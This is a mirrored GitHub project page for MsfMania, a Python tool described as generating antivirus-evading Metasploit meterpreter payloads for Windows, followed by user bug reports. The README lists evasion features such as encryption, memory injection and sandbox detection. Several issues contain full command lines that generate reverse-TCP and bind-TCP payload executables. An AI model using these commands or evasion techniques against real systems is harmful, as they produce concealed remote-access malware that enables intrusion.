Giter VIP home page Giter VIP logo

msfmania's Introduction

MsfMania

MsfMania is a command line tool developed in Python that is designed to bypass antivirus software on Windows and Linux/Mac in the future. alt text

alt text

Summary

PRO version

Demo of MsfMania PE Loader --> https://www.youtube.com/watch?v=Ka-mygowNL0

Demo of MsfMania 0.2.1 --> https://www.youtube.com/watch?v=o19GEnHy-is

You can also join the Telegram group https://t.me/msfmaniapros

Requirements

  • Latest version of Kali Linux
  • The kali-rolling repository
  • Python3

Installation

  • Git clone this repository: git clone https://github.com/G1ft3dC0d3/MsfMania.git
  • cd into the MsfMania folder: cd MsfMania
  • Good pentest

Usage

python3 MsfMania.py -h

Community version features

  • Polymorphic C/C++ source code.
  • x86/x64 staged/stageless windows payload meterpreter/shell.
  • Local & remote memory injection
  • XOR encryption.
  • Sandbox/Antivirus Evasion.
  • Junkcode.
  • Run as Administrator.
  • Executable customizable with an icon.
  • Cross-compiler MinGW.
  • Rar compression.
  • Metasploit auto config
  • Sign executable
  • UPX Packer

msfmania's People

Contributors

jarvices avatar pernat1y avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

msfmania's Issues

Error generating shellcode module 'lib.gen' has no attribute

hi,
thxx a lot for this tool, i wanted to give it a try, and got this script error when launching shellcode generation.
Setup had no issues:
Enter you choice : bdl1
Traceback (most recent call last):
File "MsfMania.py", line 417, in
SHELLCODE += gen.SHELLCODE_GENERATION(ARCHITECTURE, PAYLOAD, LHOST, LPORT)
AttributeError: module 'lib.gen' has no attribute 'SHELLCODE_GENERATION'

hope it ll help

FileNotFoundError: [Errno 2] No such file or directory: 'output/testfile.exe'

Hi I always get this error message

Traceback (most recent call last)
File "/root/MsfMania/MsfMania.py", line 253, in
original_file_size = check_file_size()
File "/root/MsfMania/MsfMania.py", line 186, in check_file_size
fs = path.getsize(filename)
File "/usr/lib/python3.9/genericpath.py", line 50, in getsize
return os.stat(filename).st_size
FileNotFoundError: [Errno 2] No such file or directory: 'output/testfile.exe'

No such file or directory: 'output/malware.exe'

image
I am not completely sure how this tool is putting the malware into the output folder but if it is initially writing the file to the current folder then maybe use the shutil modules copy function. If the program is just getting the output and storing it in a variable and then modifying the payload, maybe change directory using os.chdir into the output directory then write the file.

Failed to create Payload

Hey,

what do i wrong?

python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -lh 192.168.0.10 -lp 1234 -o Malicious -it local --hash md5

[+] Shellcode generated.

[+] Shellcode encrypted.

[+] Evasion code added.

sh: 1: x86_64-w64-mingw32-windres: not found
[+] File compiled and stripped.

Traceback (most recent call last):
File "/home/kali/Downloads/MsfMania/MsfMania.py", line 253, in
original_file_size = check_file_size()
File "/home/kali/Downloads/MsfMania/MsfMania.py", line 186, in check_file_size
fs = path.getsize(filename)
File "/usr/lib/python3.9/genericpath.py", line 50, in getsize
return os.stat(filename).st_size
FileNotFoundError: [Errno 2] No such file or directory: 'output/Malicious.exe'

Can't get it to work? (solved)

Hello!

Just wanted to let you know it seems something broken with generated exe files.
Launching generated output.exe on target (Windows Server 2012 R2) no connection made to listener. Tried lots of times, no avail.
Can you recheck please isn't something broken with MsfMania?
P.S The listener is fully functional and lport reachable (verified).

Thanks in advance!

1) python3 MsfMania.py -a x86 -p windows/meterpreter/reverse_tcp -lh 192.168.31.60 -lp 8088 -o localx32 -it local
2) python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -lh 192.168.31.60 -lp 8088 -o local2 -it local



msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.31.60:8088 

Question

Can I use your code to encrypt and compile some other python code into an exe? Ex. Encrypt print("Hello World") and compile it to an exe.

Invalid Payload

Hey! Thanks for the tool who can be usefull for red team operation!

I have tried it and i get the error :

image

I didn't put any space or else

don`t start

root@kali:~/soft/MsfMania# python3 MsfMania.py
Traceback (most recent call last):
File "MsfMania.py", line 1, in
from lib import evasion, body, compiler, compression, core, decoy, gen, metascript, encryption
ImportError: cannot import name 'metascript' from 'lib' (unknown location)

I installed:

  1. python3 setup.py
  2. python3 MsfMania.py

after command: chmod +x MsfMania.py

root@kali:~/soft/MsfMania# ./MsfMania.py
from: too many arguments
./MsfMania.py: строка 3: TYPE: команда не найдена
./MsfMania.py: строка 4: ARCHITECTURE: команда не найдена
./MsfMania.py: строка 5: PAYLOAD: команда не найдена
./MsfMania.py: строка 6: LHOST: команда не найдена
./MsfMania.py: строка 7: LPORT: команда не найдена
./MsfMania.py: строка 8: FILENAME: команда не найдена
./MsfMania.py: строка 9: SHELLCODE: команда не найдена
./MsfMania.py: строка 10: синтаксическая ошибка рядом с неожиданным маркером «(»
./MsfMania.py: строка 10: `BUFFNAME = core.VARNAME_CREATOR()'

ISSUE: MsfMania crashes when using -c0='-f {format}'

Error thrown:

Traceback (most recent call last):
  File "/home/kai/MsfMania/./MsfMania.py", line 242, in <module>
    vshellcode, decoder_stub = encryption.shellcode_generation(msfvenom)
  File "/usr/lib/python3.10/site-packages/lib/encryption.py", line 9, in shellcode_generation
    shellcode = run(msfvenom, shell=False, stdout=PIPE).stdout.decode('utf-8')
UnicodeDecodeError: 'utf-8' codec can't decode byte 0x90 in position 2: invalid start byte

How to recreate:

python3 ./MsfMania.py -a x64 -p windows/x64/meterpreter/bind_tcp -it local -lp 1234 -lh 192.168.0.1 -o bind -cO='-f exe-service'

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.